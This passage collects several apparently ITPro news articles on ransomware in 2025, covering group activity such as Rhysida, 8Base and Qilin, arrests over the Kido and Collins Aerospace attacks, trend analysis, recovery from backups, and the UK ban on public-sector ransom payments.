"The evidential threshold for designation under the regulations is significantly lower than any in the criminal process, and the real-world impact on sophisticated actors operating primarily in hostile jurisdictions can be modest," he said.

"While sanctions are undoubtedly a valuable addition to the law-enforcement toolkit against transnational cyber crime, they deliver a form of administrative rather than criminal justice and are best viewed as potentially complementing - rather than supplanting - efforts to secure arrests, prosecutions, and asset forfeiture through the courts."

MORE FROM ITPRO

• Russia is targeting unpatched vulnerabilities – what can tech leaders do to shore up defenses?
• Are we in a cyber awareness crisis?
• Enterprises need to acknowledge the importance of basic cyber hygiene

More businesses than ever are now reporting that they’re choosing to recover from backups, rather than cede to ransomware demands. In fact, recent Databarracks research found that just 17% of UK businesses paid the ransom in the past year.

The changes in response and recovery are in part down to better backup practices. Managed Service Providers (MSPs), IT partners, and resellers have all played a crucial role in supporting businesses beyond the common compliance checkboxes and anti-virus software solutions of the past.

Businesses are now utilizing channel partners’ expertise to implement resilience strategies that include air-gapped and immutable backups and conducting regular testing, planning, and rehearsal. All of this is giving businesses the confidence to say no to ransom demands.

Air-gapped, immutable backups

The best exit route for organizations facing ransomware is to be in a position where they can choose not to make the payment. In order to do that, they first need to have an air-gapped, immutable backup that can’t be compromised.

There are several different methods to create air gaps now. There are also several ways to introduce ‘immutability’ that balance access with storage and cost. The channel can play a crucial part in supporting businesses with this step, advising on the best method, solution, and supporting technology per a business’s unique needs, then handling the implementation too.

One of the added benefits of outsourcing backups to a managed service provider is that you introduce another level of separation between production data and backups. Our recommendation from a continuity perspective would be to adopt a multi-vendor approach wherever possible. For example, having one supplier delivering production IT and another looking after IT resilience.

Implementing immutable storage is often touted as a silver bullet, but channel partners need to explain to their customers that they are committing to an increase in storage, too. There’s no blanket policy or simple answer for every organization; any decisions need to balance cost and risk.

Having all of this in place isn’t enough on its own, either; businesses also have to want to refuse the ransom. In rare cases, the ransom will even cost less than carrying out your own recovery.

Prepared, rehearsed, and resilient

The right channel partner can support more than just implementing new techniques and technologies. They also play a role in keeping cybersecurity policies and incident response plans up to date and can ensure that businesses are aware of any new requirements.

Crucially, they ensure teams are trained to recognize and report incidents promptly. While most organizations are already delivering cybersecurity awareness training — a necessary baseline — not all are pairing it, as they should, with incident response exercises.

Channel partner support with recovery planning and rehearsal is integral in instilling confidence for when disaster strikes. It’s always advisable to conduct regular cyber crisis management exercises to test plans and ensure preparedness.

Regulation plays its part

The shift in ransomware response is also in part due to new regulations. The UK Government confirmed its new ransomware policy in July, which includes a ban on ransom payments by public sector bodies and critical national infrastructure operators, plus mandatory reporting and pre-payment notification for the private sector.

While this is bold, the data shows the direction of travel was already clear. In one sense, the policy is a formalization of where UK businesses were already headed. Paying the ransom used to feel like the only option. Now, the best-prepared organizations are recovering faster, more reliably, and without funding criminals.

Overall, the balance is shifting. Despite these changes, the best antidote to ransomware – beyond any regulatory directives – remains preparedness.

The road ahead

The channel is empowering more organizations to make that choice and take a meaningful step towards strengthening the UK’s cyber resilience and breaking the cycle of ransomware attacks.

Recovery isn’t a last resort; it’s a strategy. The organizations that plan and rehearse their recoveries are the ones that come through an attack strongest. That’s how you beat ransomware: not by paying, but by preparing to recover.

Search engine users should be cautious about downloading Microsoft Teams, with the Rhysida ransomware group using fake ads to distribute malware.

Cybersecurity firm Expel said it has discovered an ongoing malicious ad campaign delivering a malware called OysterLoader, previously known as Broomstick and CleanUpLoader.

It's the group's second campaign to impersonate the workplace collaboration platform in the last eighteen months.

OysterLoader is an initial access tool (IAT) that, once downloaded, runs a backdoor to gain long-term access to the device and network.

"The current infection chain is built on a highly successful malvertising model. Threat actors buy Bing search engine advertisements to direct users to convincing-looking, but malicious landing pages," said Aaron Walton, threat intelligence analyst at Expel.

"These search engine ads put links to the download right in front of potential victims. The most recent campaigns push ads for Microsoft Teams and impersonate the download pages. However, they’ve also cycled through other popular software such as PuTTy and Zoom."

The group uses a packing tool that effectively hides the capabilities of the malware and results in a low static detection rate when the malware is first seen.

It also uses code-signing certificates, as used by genuine software publishers, to give its own malicious files a higher level of trust.

Notably, Walton said this helped Expel detect the campaign.

"The certificates they use regularly get revoked by the certificate’s issuer, so new instances of the malware with a valid certificate indicate a new run of the campaign," he said.

"On any given day the bad actors may use multiple certificates, but seeing their files with a new fresh certificate also helps us know they’re still active. These new certificates further indicate steady investment into their campaign."

Rhysida is ramping up attacks

Along with the OysterLoader malware, Rhysida is also using the Latrodectus malware to get initial access to networks, Expel warned, which was able to establish this when analyzing files for the purpose of building detection rules.

Rhysida ranks among one of the few cyber criminal groups to be leveraging Trusted Signing from Microsoft, the company’s own service for issuing code-signing certificates.

Attackers are using Trusted Signing certificates for both OysterLoader and Latrodectus and appear to have found a way round the built-in features designed to limit misuse.

Rhysida first appeared as Vice Society in 2021, but rebranded as Rhysida in 2023, and operates on a Ransomware as a Service (RaaS), double extortion model. Since 2023, the group has posted around 200 victims on its data leak site, including governments, healthcare organisations, and critical infrastructure industries.

Earlier this year, the group claimed responsibility for attacks on the Oregon Department of Environmental Quality, the Cookville Regional Medical Center in Tennessee, Kansas-based healthcare provider Sunflower Medical Group, and mental illness and addiction group the Community Care Alliance.

Elsewhere, the group also hit the Maryland Department of Transportation alongside an attack on the British Library.

MORE FROM ITPRO

• How hackers bypass MFA – and what to do about it
• Hackers are disguising malware as ChatGPT, Microsoft Office, and Google Drive to dupe workers
• Ransomware victims are refusing to play ball with hackers

Ransomware group 8Base has claimed responsibility for an attack on Volkswagen Group in which it claims to have stolen sensitive data.

Data stolen in the attack allegedly includes invoices, receipts, accounting documents, personal employee files, employment contracts, certificates, personnel records, and numerous confidentiality agreements.

According to 8Base, the attack took place in September 2024, meaning the group has been sitting on a batch of data for more than a year.

Volkswagen has confirmed that a security “incident” occurred, but has so far been tight-lipped on the scope of the incident and whether data has been stolen.

In a statement given to Cybersecurity News, the car manufacturer said there has been no impact on its IT systems, possibly indicating the compromise occurred through a third-party supplier or subsidiary.

Who’s behind the Volkswagen attack?

8Base is a relative newcomer to the threat landscape, having burst onto the scene in 2023. The group is believed to be an offshoot of the Phobos ransomware group, and has reportedly targeted more than 1,000 organizations since forming, netting a total of $16 million in ransom payments.

Often gaining initial access via phishing campaigns or buying credentials on the dark web, the group relies mainly on a strategy of double extortion, encrypting victims' data and threatening to publish stolen information unless a ransom is paid.

Earlier this year, four Russian nationals were arrested in Thailand for alleged involvement in the group, following a joint police operation by 14 countries. The law enforcement sting saw 27 servers linked to the group seized and taken offline.

If confirmed, the Volkswagen attack may represent a change in strategy for the group. Threat intelligence from Europol shows 8Base has tended to focus mainly on small to medium-sized businesses, which often lack the cybersecurity defences to protect themselves.

Previous victims are believed to include a children’s hospital, health care providers, and educational institutions.

MORE FROM ITPRO

• Ransomware victims are refusing to play ball with hackers
• The number of ransomware groups rockets as new players emerge
• The top ransomware trends for businesses in 2025

The number of active ransomware groups has reached a record high, with new, smaller groups sliding under the radar.

In its latest quarterly Ransomware & Cyber Threat Report, GuidePoint's research and intelligence team said they'd seen a 57% increase in the number of ransomware groups, rising from 49 in the third quarter of 2024 to an all-time high of 77 now.

The number of victims, though, has remained relatively steady, stabilizing at around 1,500-1,600 per quarter since the last quarter of last year.

More than half of victims this quarter – 56% – were based in the US. No other country came anywhere close, with Germany second at 5% and the UK third at 4%.

The most-hit industries were manufacturing, technology, and the legal sector, with 252 publicly claimed manufacturing attacks during the second quarter, up 26% quarter-over-quarter.

"Ransomware activity has settled into a new normal, averaging 1,500 to 1,600 victims per quarter since late 2024," said Nick Hyatt, senior threat intelligence analyst at GuidePoint Security.

"Yet while overall activity has stabilized, the number of distinct ransomware groups has surged to a record 77 – highlighting both the consolidation of skilled operators within major RaaS (ransomware as a service) platforms and the ongoing churn of emerging or lower-skill actors entering the ecosystem."

The Qilin ransomware group was particularly busy. Its activity surged 318% year-over-year, claiming 234 victims this quarter; Akira was next, with 130 victims, the team said.

IncRansom, which first emerged in August 2023, showed a sudden surge in activity during the third quarter, making them the third most active group. The team said it's not clear whether IncRansom will keep this level of activity up.

SafePay, meanwhile, is an insular ransomware group that first appeared in late 2024, but that now claims a total count of 258 victims across 29 distinct industries and 30 countries for the year to date.

And while the research looked at the number of claimed victims from established groups, the team said they'd also seen, anecdotally, an increase in attacks that couldn't be attributed to any known group, or where the threat actors even outright refused to identify themselves.

"This can plausibly be the result of growing distrust in the RaaS construct, reduced barriers to entry for aspiring cybercriminals, or splintering of existing groups resulting in outcast affiliates forced to find a new home," they said.

"In the months and quarters ahead, we will specifically be looking to determine the timelines, efficacy, and victim outputs of such groups to aid in our ongoing analysis and determinations."

And, said Hyatt, the growing diversity of ransomware groups is creating new challenges for defenders.

"While established actors like Qilin and Akira are streamlining their operations, newer groups such as SafePay demonstrate how even small, insular actors can thrive by staying under the radar," he said.

"This 'new normal' isn't a reason for complacency – it underscores the need for sustained vigilance in an increasingly fragmented threat landscape."

The UK's Metropolitan Police have arrested two teenagers for the recent data breach of the Kido chain of children's nurseries.

The two men, both aged 17, were arrested yesterday in Bishop's Stortford, Hertfordshire, as part of a raid on a number of properties. They were taken into custody, where they are being questioned on suspicion of computer misuse and blackmail.

"Since these attacks took place, specialist Met investigators have been working at pace to identify those responsible," said Will Lyne, the Met's head of economic and cybercrime.

"These arrests are a significant step forward in our investigation, but our work continues, alongside our partners, to ensure those responsible are brought to justice."

The attack on the Kido pre-school chain saw the theft of data on around 8,000 children. It appeared to have been carried out through the breach of Kido's billing, staffing, and reporting software system, supplied by Famly.

It was widely condemned when the previously unknown hackers, who called themselves Radiant, published the profiles of 10 children and threatened to publish more if their ransom demands weren't met.

The data included the children's names, dates of birth, and birthplaces, along with the personal details of parents, grandparents, and guardians, including their addresses and phone numbers.

The hackers were even reported to have contacted the parents of some affected children directly to extort them.

However, the attackers later removed all the stolen data and pictures from their darknet site and said they'd deleted all the data they'd stolen.

"We understand reports of this nature can cause considerable concern, especially to those parents and carers who may be worried about the impact of such an incident on them and their families," said Lyne.

"We want to reassure the community and anyone affected that this matter continues to be taken extremely seriously."

At the time, Palo Alto researchers noted that Radiant appeared to be a brand new group, and unaffiliated with any nation-state actors or other established cybercrime syndicates.

Targeting small children and publishing such a broad range of personal data was also something of a first. And when asked by BBC News whether they felt bad about extorting a nursery using the children's data, the criminals said they 'weren't asking for an enormous amount' and that they 'deserve some compensation for our pentest'.

While this was the first attack of its kind, Palo Alto Networks warns that there may be more, with many educational establishments using similar billing, staffing, and reporting software without understanding the security implications.

Palo Alto advises schools and nurseries that use such platforms to immediately review the security controls they currently have in use. They should rotate passwords, particularly across key operational and administrative accounts, and adopt multi-factor authentication where available.

The UK’s National Crime Agency (NCA) has made an arrest over last week's cyber attack on several airports.

The agency said a man in his forties was arrested in West Sussex on suspicion of Computer Misuse Act offences, and released on conditional bail.

“Although this arrest is a positive step, the investigation into this incident is in its early stages and remains ongoing,” said Paul Foster, NCA deputy director and head of the NCA’s National Cyber Crime Unit.

The cyber attack on software supplier Collins Aerospace led to major disruption for airlines flying out of London Heathrow, Brussels, and Berlin, with carriers forced to check passengers in manually.

The attack targeted Collins' ARINC cMUSE software, which allows airlines to share check-in desks and boarding gate positions rather than using their own dedicated infrastructure.

It's been confirmed that the incident was a ransomware attack, but so far little more is known. However, cybersecurity expert Kevin Beaumont said he had identified the ransomware used.

"The Europe airlines ransomware situation is a variant of Hardbit ransomware, which doesn’t have a portal and is incredibly basic," he wrote on Mastodon.

"They’ve had to restart recovery again as the devices keep getting reinfected. I’ve never seen an incident like it. Somebody like the NCSC needs to go in and help them with IR."

There's been a lot of speculation that the attack could have been carried out by a nation-state-affiliated group, with Russia having been tipped as the most likely suspect. That may now be in doubt, said Ryan McConechy, CTO at Barrier Networks.

"While details are still emerging, the NCA has confirmed that the suspect was arrested in the UK, which will likely come as a surprise to many," he said.

"While more information is likely to surface soon, the incident once again highlights that no organization is immune to cyber crime today. Whether attackers hit an organisation directly, or impact a large pool of organizations through a supply chain, cyber crime affects all businesses."

RTX, the parent company of Collins Aerospace, has confirmed in a filing with the US Securities and Exchange Commission (SEC) that the incident was a ransomware attack.

"The Company is diligently investigating the incident with the assistance of internal and external cybersecurity experts and has notified domestic and international law enforcement authorities and certain other government agencies," it said.

"The Company is also communicating with its customers and other stakeholders and providing technical support and guidance to affected airlines and airports."

RTX said it is investigating the incident with the help of internal and external cybersecurity experts, and that it's notified domestic and international law enforcement authorities and other government agencies.

Most flights are now operating normally, although some check-in desks are still processing passengers manually.

“Cyber crime is a persistent global threat that continues to cause significant disruption to the UK," said Foster. "Alongside our partners here and overseas, the NCA is committed to reducing that threat in order to protect the British public.”

MORE FROM ITPRO

• Cyber attacks are costing UK firms billions every year
• The top ransomware trends for businesses in 2025
• Financial impact of cyber attacks on UK retailers laid bare

The ransomware landscape is changing rapidly as new arrests are made and prolific groups are taken down. Some things remain the same, such as the constant stream of attacks taking advantage of ransomware.

But several new trends are emerging such as the fragmentation of the ransomware ecosystem, as well as major groups like the Dragonforce ransomware-as-a-service (RaaS) operation making headlines following retail breaches against M&S and the Co-op.

Following on from ITPro’s look at the top new ransomware groups to look out for, here are the biggest ransomware trends in 2025 so far.

Persistence of RaaS and changes in the ecosystem

It’s been around for a while, but the ransomware as a service (RaaS) model remains a dominant force in the cyber threat landscape, according to experts. Despite large law enforcement operations targeting groups including LockBit and BlackCat RaaS has not disappeared, says David Dunn, EMEA head of the cybersecurity practice at FTI Consulting.

Dunn tells ITPro the crackdown on major RaaS operations has resulted in a “notable splintering” of the ransomware ecosystem. “The era where two or three RaaS operators controlled the majority of incidents appears to be over – at least for now. The distinction between initial access brokers, affiliates and core operators has become increasingly blurred.”

This has led to a more fragmented, but “still very active” threat environment, he says.

With the decline of major RaaS groups, numerous smaller operations such as Akira, DragonForce, and Qilin have stepped in to fill the void, says Dunn. “Their tactics tend to be more aggressive and less constrained by the traditional norms that previously deterred attacks on certain sectors such as healthcare.”

Data encryption on the decline

Traditionally, ransomware attacks see adversaries encrypt the data they steal, forcing firms to pay up if they want to get business back up and running. But companies are getting wise to this and as a result, backups are improving.

This is driving cybercriminals to change tactics. The data breach aspect of ransomware is becoming the prominent method to extort victims – rather than offers to decrypt data, says David Sancho, senior threat researcher at Trend Micro. “It used to be the case that the victim would pay a ransom for data decryption, but this is less common now. Instead, the victims tend to have better data backups.”

Changing financial impact

Ransom payment bans are being mooted in multiple countries, and this is already starting to have an impact on the number of firms actually paying up.

Although the overall rate of ransom payments has declined, possibly due to better preparedness and insurance changes, the average ransom amount has steadily increased through 2025, says Dunn. This suggests that while fewer victims are paying, those who do are facing higher financial demands.

In general, payment of ransoms has continued to drop year on year, says Gavin Knapp, cyber threat intelligence principal lead at Bridewell. “This is potentially linked to increased legislation around ransomware and tougher sanctions being placed on ransomware and cybercrime related entities.”

This is supported by Chainalysis data from February 2025, showing a 35% overall decrease in total volume of ransom payments, which the firm attributed to stronger action by law enforcement, international collaboration, and greater hostility to paying on the part of victims.

Lone wolf attacks and vulnerabilities

Ransomware attacks are traditionally carried out by groups, but a new trend is seeing so-called “lone wolves” operating in the market. There is a growing threat of ransomware attacks carried out by individuals or very small groups, says Allan Liska, a threat intelligence analyst at Recorded Future. “The lone wolves eschew the traditional RaaS model and operate independently in a bid to fly under the radar of the authorities.”

Lone wolves or individual ransomware affiliates going alone has steadily increased over the past 18 months, says Knapp. He thinks this could be due to the fear of becoming the victim of an exit scam, where the RaaS operation ends without paying the affiliates their share. “The prevalence of leaked tools and RaaS source code has also made it much easier for attackers to go it alone or stand-up their own ransomware group.”

Attackers are increasingly taking advantage of unpatched software to launch ransomware attacks. Groups such as Cl0p and Termite have become proficient in exploiting internet-facing software and services, says Knapp. “Performing vulnerability research and developing or acquiring exploits for software gives them the ability to compromise a large number of victims in one campaign, which increases the likelihood of receiving a bigger payout.”

The more time attackers can spend inside systems undetected, the more damage they can cause. It is with this in mind that groups and affiliates continue to spend time and resources on being able to evade endpoint detection and response (EDR) tools, says Knapp. “Numerous tools have emerged that allow ransomware groups to disable or blindside detection," he explains. "These tools take advantage of native software features to disable or blunt their capabilities, while others leverage vulnerable drivers to be able to terminate EDR processes.”

There’s a thriving underground market on the dark web. Credentials to EDR consoles or testing services are openly bought and sold on forums and private messaging platforms, says Jim Walter, senior threat Researcher at SentinelLABS. “We’re seeing services pop up where adversaries can even trial their ransomware against real-world defences in semi-private labs.”

How to respond to the latest trends

Ransomware is constantly evolving, but there are steps firms can take to prevent and mitigate attacks.

With adversaries taking advantage of unpatched vulnerabilities to compromise systems, it’s important to prioritize patching of public-facing devices urges Brandon Tirado, director of threat research at ReliaQuest.

At the same time, reinforce multifactor authentication (MFA) with additional controls and require verification for reset requests, says Tirado. “Social engineering is one of the oldest hacking techniques, yet it remains highly effective. IT help desks with weak verification processes can be exploited to bypass MFA through simple reset requests.”

Overall, mitigating ransomware should be a company-wide effort. An effective means of defence is making sure employees know what they are up against, says Liska. “Regular staff training, updates and alerts can help keep staff vigilant against evolving threats.”

Cybersecurity professionals are being bombarded with alerts outside of business hours, with hackers deliberately timing their attacks for maximum impact.

Research from Arctic Wolf shows more than half (51%) of alerts recorded by security operations teams are recorded after the majority of the business has clocked out.

Around 15% of all alerts also take place on weekends, the study found, forcing security workers to drop personal activities and respond to potential incidents.

Dan Schiappa, Arctic Wolf’s president of technology and services, said the study highlights the 24x7 nature of the profession and gives a glimpse into the challenges faced by teams.

“Today’s threat landscape is defined by round-the-clock attacks that target identity, exploit timing, and drive alert fatigue, leaving defenders to navigate increasingly complex tactics,” he said.

Hackers are biding their time

Threat actors deliberately launch attacks outside of business hours or during holiday periods to maximize their chances of success, according to Arctic Wolf.

With skeleton crews essentially holding the fort, this represents the perfect opportunity to hit enterprise hard and leave teams scrambling.

“Some of the most notorious recent cyber attacks were meticulously planned to coincide with long weekends or holidays,” the study noted.

In 2021, the Scottish Environmental Protection Agency (SEPA) gained firsthand experience in this regard, with hackers striking on Christmas Eve.

The attack, claimed by the infamous Conti ransomware group, resulted in the theft of thousands of SEPA files.

Arctic Wolf’s findings align with previous research on these tactics, with analysis from Darktrace showing 76% of ransomware attacks occurring either after hours or over the weekend.

“As reduced staff wind down and employees mentally and physically log off from the workplace, there is a decline in the speed of detection and triage within an enterprise,” the company noted.

Similar analysis from Semperis last year showed 72% of ransomware victims were attacked outside of working hours, such as during holiday periods.

Notably, among organizations with dedicated security operations centers (SOCs), around 85% reduced staffing levels by up to 50% during holidays or weekends.

A key factor behind this, the study found, lay in general staffing challenges or the associated costs with overtime wages.

MORE FROM ITPRO

• Best online cybersecurity courses
• How to choose the best cyber security vendor for your business
• The best malware removal tools

The US Department of Justice (DoJ) is offering a reward of up to $10 million for information leading to the arrest of a notorious ransomware criminal.

The suspect, Volodymyr Viktorovych Tymoshchuk, is believed to be a leading figure in an organized crime network responsible for the 2019 ransomware attack against a major Norwegian aluminum company, as well as a series of other global cyber attacks.

"The fugitive is wanted by several countries and is considered a top priority target for international law enforcement," said Europol, which has added Tymoshchuk to its EU Most Wanted list.

The 28-year-old Ukrainian national has a series of aliases – Deadforz, Boba, Farnetwork, Msfv, and Volotmsk – and is wanted for computer-related crimes, participation in a criminal organization, and racketeering and extortion.

Between 2018 and 2020, Tymoshchuk and his accomplices took part in the deployment of the LockerGoga ransomware against hundreds of companies, disrupting operations and demanding a ransom.

The group's activities caused more than $18 billion in damage worldwide, Europol said.

“Volodymyr Tymoshchuk is charged for his role in ransomware schemes that extorted more than 250 companies across the United States and hundreds more around the world,” said US acting assistant attorney General Galeotti.

“In some instances, these attacks resulted in the complete disruption of business operations until encrypted data could be recovered or restored."

The international investigation has already led to the arrest of several other members of the criminal network in Ukraine.

According to the DoJ, law enforcement agencies have since mapped the structure of the group, identifying actors at every level – from malware developers and intrusion specialists to the money launderers responsible for handling the illicit proceeds.

The DoJ is also offering a separate reward of up to $1 million for information leading to the “arrest and/or convictions of other key leaders”.

Global damages range in the tens of billions

The group is believed to have carried out attacks against organizations in 71 countries, specifically targeting large corporations and deploying MegaCortex, Nefilim, HIVE, and Dharma ransomware, as well as LockerGoga.

Attacks took place through techniques including brute force attacks, SQL injections, and sending phishing emails with malicious attachments in order to steal usernames and passwords.

Once inside a network, the attackers remained undetected and gained additional access using tools including TrickBot malware, Cobalt Strike, and PowerShell Empire to compromise as many systems as possible before triggering ransomware attacks.

They are believed to have encrypted more than 250 servers belonging to large corporations, resulting in losses exceeding several hundreds of millions of euros.

Who is Volodymyr Viktorovych Tymoshchuk?

Between July 2020 and October 2021, Tymoshchuk was one of the administrators of Nefilim ransomware, a ransomware as a service (RaaS) enterprise that provided tools to affiliates in return for a percentage of the extortionate payments they collected.

Nefilim ransom notes typically threatened the victims that, unless they paid up, the stolen data would be published on the group's publicly accessible Corporate Leaks websites.

“Tymoshchuk is a serial ransomware criminal who targeted blue-chip American companies, health care institutions, and large foreign industrial firms, and threatened to leak their sensitive data online if they refused to pay,” said Joseph Nocella, US attorney for the Eastern District of New York.

“For a time, the defendant stayed ahead of law enforcement by deploying new strains of malicious software when his old ones were decrypted. Today’s charges reflect international coordination to unmask and charge a dangerous and pervasive ransomware actor who can no longer remain anonymous.”

MORE FROM ITPRO

• The Scattered Spider ransomware group is infiltrating Slack and Microsoft Teams to target vulnerable employees
• Ransomware victims are refusing to play ball with hackers
• A prolific ransomware group says it’s shutting down and giving out free decryption keys to victims

Jaguar Land Rover was forced to shut down production systems over the weekend after being hit with a cyber attack, the company has revealed.

The car manufacturer said it acted immediately to mitigate the attack by proactively shutting down systems in a move that thwarted attackers.

"We are now working at pace to restart our global applications in a controlled manner," JLR said in a statement. "At this stage there is no evidence any customer data has been stolen but our retail and production activities have been severely disrupted."

According to the BBC, the attack took place on Sunday, with employees at the company's plants in Halewood, Merseyside, and Solihull in the West Midlands sent home or told not to come into work the following day.

"JLR's decision to proactively shut down global manufacturing suggests this attack may have been targeting their operational systems, not just customer data," said Oakley Cox, director of operational technology of product at Darktrace.

"The speed of their response is telling - you don't typically halt production across multiple sites unless there's genuine concern about operational impact."

The attack appears to have been carefully timed, coming just as new registration plates are launched - the company's busiest time of year. Attacking over the weekend, meanwhile, meant that Jaguar Land Rover was less likely to able to respond and contain the threat.

No ransomware group has claimed responsibility. However, the automotive sector is becoming a highly attractive sector for hackers, thanks to increasing digitization and growing integration between IT and operational technology (OT).

According to Upstream Security’s 2025 Automotive & Smart Mobility Cybersecurity report, attacks against the automotive sector are on the rise - and getting bigger. The number of 'massive-scale' incidents, impacting millions of vehicles, more than tripled between 2021 and 2023, rising from 5% to 19%.

Jaguar Land Rover “did the right thing”

Nivedita Murthy, senior security consultant at Black Duck, said Jaguar Land Rover “did the right thing” by shutting down IT systems, which likely helped prevent the attack from spreading further and causing additional damage.

“As part of the post-incident activity, they would be able to identify how the attackers were able to access the systems and take advantage of them,” Murthy added.

Conversely, Nick Tausek, lead security automation architect at Swimlane, said the move raises serious questions about how organizations should react to security incidents.

"It is tentatively reassuring to see that, as of yet, no impact on customer data has been reported. However, entirely shutting down production and retail operations is not a sustainable countermeasure for cyber attacks," he said.

"JLR, as well as other automobile manufacturing organizations, should use this as a lesson in the importance of proactive cybersecurity."

This isn’t the first time the car manufacturer has fallen victim to a cyber attack. Earlier this year, it was hit by a breach that saw the theft of several gigabytes of sensitive data.

That particular incident exposed more than 700 proprietary documents, along with source code and employee and partner data.

"It raises the question of whether vulnerabilities from the prior attack still exist and were exploited to breach the company this time around," suggested Tausek.

MORE FROM ITPRO

• Ransomware attack on IT supplier disrupts hundreds of Swedish municipalities
• Google says 'claims of a major Gmail security warning are false' following recent media reports
• Warning issued to Salesforce customers after hackers stole Salesloft Drift data

200 municipalities and regional governments in Sweden have been severely disrupted following a ransomware attack on IT systems supplier Miljödata.

The company, which supplies HR systems to around 80% of the country’s municipal governments, discovered the breach on Saturday 23rd August, authorities said.

"The government is receiving ongoing information about the incident and is in close contact with the relevant authorities," said Swedish minister for civil defence Carl-Oskar Bohlin.

"CERT-SE, which has the task of supporting Swedish society in handling and preventing IT security incidents, has offered advice and support to both the company in question and the affected customers."

Bolin said the country's national cybersecurity center is coordinating disclosure to the relevant authorities, and that a police investigation is underway. The full effects of the breach have not yet been established, he added.

However, regions including Halland and Gotland have warned citizens that their personal data may have been affected. Halland said its Adato sick leave management system, Stella work-related injury reporting system, and Novi HR management system are currently down.

The Gotland region, meanwhile, uses four Miljödata systems, handling medical certificates, rehabilitation plans, occupational injuries, and more.

“Region Gotland is one of many regions and municipalities that are affected by the cyber attacks that Miljödata is exposed to,” said the region's HR Director Lotta Israelsson,

"At present, there are extensive investigations at Miljödata to investigate the extent of the attack and we are in continuous contact with the supplier."

No ransomware group has claimed responsibility for the attack. However, Miljödata has reportedly received a ransom demand of 1.5 bitcoin - just $163,245 - implying that it's unlikely to be one of the big players.

“The attack in Sweden shows the reality that for cyber criminals, targeting supply chain vulnerabilities is one of the most effective levers to cause disruption at scale," said Andrew Lintell, general manager, EMEA, at Claroty.

"By compromising a single IT system supplier can cripple vital functions and processes in one strike."

Miljödata attack the latest to target public sector

Supply chain attacks on government organizations are on the rise around the world, and Sweden is no exception.

Last year, for example, Swedish IT services and cloud hosting provider Tietoevry was hit by a ransomware attack, again involving HR systems, that affected businesses and government agencies including Sweden’s national government service center.

"For municipalities and other public-sector entities, this event shows the urgent need to treat third-party and supply chain security as a core pillar of resilience," said Lintell.

"That means maintaining full visibility into all connected systems and taking on the responsibility of continuously assessing the security posture of vendors. It is key to enforce least-privilege access and ensure that contingency plans are in place to keep essential operations running even when a trusted provider is compromised."

MORE FROM ITPRO

• Nearly one-third of ransomware victims are hit multiple times, even after paying hackers
• Ransomware victims are refusing to play ball with hackers
• Ransomware payments are banned in the public sector: should businesses still pay?

The UK could soon become the first country to ban ransomware payments, or at least, payments from public funds. This is the result of a new government consultation on legislation that, if enacted, could create a legal ban on ransomware payments by the public sector and regulated organizations that oversee critical national infrastructure (CNI).

The UK could soon become the first country to ban ransomware payments, or at least, payments from public funds. This is the result of a new government consultation on legislation that, if enacted, could create a legal ban on ransomware payments by the public sector and regulated organizations that oversee critical national infrastructure (CNI).

These proposals also put forward measures to increase cyber incident reporting, from organizations not covered by the “targeted ban” on ransomware payments. The goal, according to the Home Office, is to increase transparency and intelligence around cyber attacks, and disrupt the flow of public funds to criminal groups.

“The ban would target the business model that fuels cyber criminals’ activities and makes the vital services the public rely on a less attractive target for ransomware groups,” the Home Office wrote.

Mandatory reporting, for its part, should improve the intelligence available to law enforcement agencies. Businesses not covered by the ban would have to tell the Government if they intended to pay a ransom.

As security minister Dan Jarvis said, announcing the consultation results last month, “ransomware is a predatory crime that puts the public at risk, wrecks livelihoods and threatens the services we depend on. That’s why we’re determined to smash the cyber criminal business model and protect the services we all rely on.”

Banning ransomware payments by the public sector is popular, at least according to the consultation. The Government says that 72% of respondents agreed to the idea of a “targeted ban” for public sector bodies and CNI owners and operators. Mandatory reporting for organizations outside the ban was supported by 63%.

Unintended consequences

The question, though, is whether the measures can achieve their intended results or might cause wider security problems.

“The banning of ransomware payments by UK public bodies and formalizing of ransomware reporting will have a positive impact,” Chris Atkinson, cyber security expert at PA Consulting told ITPro.

“It will help disrupt cyber criminals and give UK authorities even greater visibility of the problem. It will not be the end of ransomware though, ransomware as a service (RaaS) will continue and – at least in the near term – be displaced to other sectors. These sectors are already facing cyber-attacks, but these could increase.”

This, and other unintended consequences, are causing concern among cybersecurity experts.

As Atkinson suggests, criminal groups might simply switch their attention away from public sector bodies, to those that do not fall under the proposed new rules.

“The intent is to remove financial incentives from targeting public sector and CNI organizations and reduce the profitability of ransomware,” he explains. “This is a good thing but will likely lead to displacement of ransomware attacks to other sectors not covered by the ban – though no sector has been safe so far.”

As recent ransomware attacks against the retail sector show, cybercriminals are adept at finding weak spots.

Public sector organizations, including parts of the NHS and education, were being targeted because their cybersecurity measures are relatively weak. Much of this is down to resource constraints, and the need to support older technology.

But Atkinson warns that ransomware is not the only way attackers make money, so any payment ban can only be a partial solution. “Fraud, theft, and money laundering will continue to be incentives to cyber criminals,” he says. And the public sector will still be vulnerable to those other forms of attacks, especially if funding for security measures remains tight.

“There's a couple different ways this could go,” Crystal Morin, cybersecurity strategist at Sysdig, tells ITPro.

“It depends on who the attacker is and what they want to gain. They could continue to target the public sector and government because they may be ill-prepared and slow to respond. They may know that they’re not going to receive payment, but they’re going to be able to take down a network, or obtain public information or government data.”

This, she suggests, could be sold on the dark web, passed on to nation state adversaries, or used by crime groups for other purposes such as extortion. So a ransomware ban will certainly not remove the need for public sector bodies to invest in security.

“You have to assume there is someone in your environment, especially in the public sector or critical national infrastructure,” she says.

Facts on the ground

Nonetheless, there is growing interest in ransomware payment bans.

The UK's proposal to ban ransomware payments is by no means the only measure governments are taking to counter ransomware attacks. What sets the UK proposals apart is that the plans will have the backing of the law.

Most other measures, at least so far, are voluntary. One example is the International Counter Ransomware Initiative, a US-led alliance of 40 countries. Launched some two years ago, the signatories also includes the UK, Canada, India, and almost every EU member state, all of whom pledged not to pay ransoms. And law enforcement agencies, such as the FBI, strongly discourage ransom payments.

There is also the possibility, in the US and elsewhere, of prosecution under existing counter-terrorism, organised crime, and sanctions legislation.

But as Stephen Boyer, chief innovation officer at cybersecurity firm Bitsight, points out, there have not yet been any documented cases of the threat being carried through. “I’ve not seen it yet, though [payment] is strongly discouraged,” he tells ITPro. But the risks of penalties are there.

He adds that alongside evidence that public sector bodies are moving away from ransomware payments, internal bans have long been the case at many controlled organizations. The UK government already has a policy of not paying ransoms. “The UK public sector hasn’t really been paying, so this is not a huge deviation,” he says.

The proposals will extend the non-payment rule to CNI and publicly funded “arms-length bodies”, but Boyer, at least, expects centralized reporting to have more of an impact on countering ransomware.

